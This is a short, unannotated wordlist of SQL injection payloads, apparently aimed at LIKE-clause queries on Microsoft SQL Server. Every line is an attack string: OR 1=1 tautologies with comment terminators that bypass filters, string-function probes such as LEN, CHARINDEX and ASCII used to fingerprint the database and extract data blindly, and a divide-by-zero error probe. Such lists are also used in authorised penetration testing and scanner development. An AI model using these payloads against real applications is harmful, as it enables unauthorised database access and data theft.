%' AND LEN('a')=1 AND 'a'='a
%' AND DATALENGTH('a')=1 AND 'a'='a
%' AND CHARINDEX('a','abc')=1 AND 'a'='a
%' AND PATINDEX('%a%','abc')=1 AND 'a'='a
%' AND LEFT('abc',1)='a' AND 'a'='a
%' AND RIGHT('abc',1)='c' AND 'a'='a
%' AND SUBSTRING('abc',1,1)='a' AND 'a'='a
%' AND ASCII('a')=97 AND 'a'='a
%' AND UNICODE('a')=97 AND 'a'='a
%' AND LOWER('A')='a' AND 'a'='a
%' AND UPPER('a')='A' AND 'a'='a
%' AND (1)=1 AND 'a'='a
%' AND (SELECT 1)=1 AND 'a'='a
%' OR 1=1-- 
%' OR 1=1-- -
%' OR 1=1#
%' OR 1=1/*
%' OR 1=1 AND 'a'='a
%' AND 1=1 AND '1'='1
%' AND 1=2 AND '1'='1
%' AND 1 IN (1) AND 'a'='a
%' AND 1/0=1 AND 'a'='a
